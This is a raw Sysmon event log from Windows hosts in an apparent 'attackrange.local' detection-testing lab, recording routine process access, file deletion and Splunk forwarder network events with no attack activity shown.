07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.197{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.182{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.182{0C1E0330-F2A0-60EB-3A79-00000000D001}2864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.713{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44859898511B19BEFB62A71E4A935E0F,SHA256=C2FE4BF39D7E7A8C7E611CBFF773986A1262D2310767B21CB06BB1F4097D41BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E98EE942F4231E500D127CF2BB7CDBF,SHA256=04E51EE3D3B1B445A0BA85D0EAFFB00DA248B91605C8157A33F80CE676D2538D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=010A4AE028416BA28251745B35975DC1,SHA256=66D7AD829E8B61D8E3205DAF7D01FDBE9E78C69C2D8711CB8627287659DD1F4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:30.744{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA38D5D9D0BBDEAB65EA5D20754051B7,SHA256=E1F96603A0DDDDC31220128373F2AA97B91FFC061153BED5058764AC1E7E3D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:30.024{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15A2D139925B8C09FA4CE8F2CD11BEC,SHA256=842381F370BCF8E20658F6D2F6A3BC33C4EE48F7BA10258DB71F24724F8D9342,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:29.284{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57146-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:30.057{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ABB74B54F8467AA15ED2B597E129B477,SHA256=584602FF287F791F0ACD8CDD40C169815AEAD283C5D180E861418017E893A1B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:31.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE777A6323B815CEDFA26DD6F66FCAE,SHA256=CBAAD230AEDDCDBD140E1E952416F374CD3244FD23A615C0B2B417A3CCCE7744,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:23.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50893-false10.0.1.12-8000- 23542300x80000000000000001045771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F18816DB928C03D3424641D7172E6242,SHA256=2AE4D329D00A0EBE5CD3858DB17167C16217E44B1C858BF18C0A81E5D5A1F7EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CBA11A5716F14A317251C468B6ACA489,SHA256=8C8136AF640F13FFFFE9BCB1E9FF50F9419D8B3FCE1BFC5C83BAE5AD8BBF8AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=22FA2A570EAE8DD955ADB82B9107E5F0,SHA256=7D733A41180D449F66B635E2B0F8A7DFD1EC340BD9B0625D0716823F15A6CF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2918A292081A7838E747401E7CD4DB01,SHA256=EBA15BF757F74A86A74859501302A2B6118DC9D11246A6F195141451707F8BE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA87859B9BB0B5F4B8FDF330D16917AD,SHA256=724998DAF06AD6D611996656D74A6F27779485C0BC0F5B319DE27C8D25EF1283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=227A6CE7ABF4025077DA5499D6EBBFEB,SHA256=DAFC57838A7604DD22C6B41EB8841E36180F38218C682863FD064BCC3389DCF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=226CAE16BE395963391E24E05D84A06A,SHA256=FBD11B7D362BD42FA3C8D96A65A56B742ADC357633CBF2CD5D8E69852AE00B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=830001BE95546DCC283306A0FAF46F3B,SHA256=47F7D6AB8C41EF6D034ABBB00C3571DB8EF63DDCF82761A7A0DB0F4DEF617623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=03FC1A03F683288E9DE4D76E4D3AED16,SHA256=C5106B40B8662BC6F6D2FB81B3DB4FCAD82678EC46ABFA96DE35F5FF7072D26A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=097E664438F0DE7EA0B585C52A6C40A6,SHA256=580321F5EFCFE0009F6DA8C9EB773E3098A167DA3E1894B5BC172D7AE7CDF4A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.539{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BA4DCC7C7DF6EAE13E4305518B1F113A,SHA256=06CC7BD6E5CD5A2931E28A46860AD32D7D53E53218DE24709D2F687C406F899C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:31.039{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A2D1B683B7A973E923259BDD2524CB,SHA256=12615CD617DC556DB62B79C441C427C76D166597B22F6967391414DC9770C8D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:32.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B22371E30331C527B4E5F7634E4170,SHA256=D326AF25A472B18CAEFBCFFF62D59D04122D8A35D5933B8EF4AB4375120E4D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:32.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47D6FDA4B9E4DFC04E51910AFEB359C,SHA256=601162AEB5953252FD9F2D670EBC43BA58D7CF3BEBB013DD5981A08A3F1F9AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:33.827{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9735E6625E43EA7E0D5E7D3BBC22024,SHA256=40C1955C6A3A5655C66FC677C662035DCF5C68E3BAC624F9F2D8E31539C6BFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:33.070{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD1B72261F5701D0D4349470C10809FD,SHA256=39A74E0EE92999D966562A1A40248830226CA34312A8BF3C790937D4838F0651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:34.843{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=991D1BCE881E82A1D15170524D7F21BE,SHA256=965EAB7FCD28DEE4CB74AEFBF0B75A53E3F802B230071D357C63AFA17F5A45CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:34.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7876B409DD10DD9EC419CAB5663FC222,SHA256=0A907B7416DBFB92D76EAD9D6D217BA4ED72EB4C011B620CD7DF39393D4FB05B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.858{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D55C1D5F27FF634781B468BD4689F671,SHA256=DF2CD03C5D69EE712C99D36196458F62E4F613CCDC12A73AB8EF3F13C6BE4C0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3D0DCE74CADA78064CDC1545F63271,SHA256=F4861E7AF20F0BECF8879F469248BA40493610F908D519BB9173E88BE04EE687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A8C83559D34EDEE4F290BF4559D0B23,SHA256=52C207B6150F385A99C76A68862C2D412C73961F596CAC52F8A7F6F6DA6DC989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 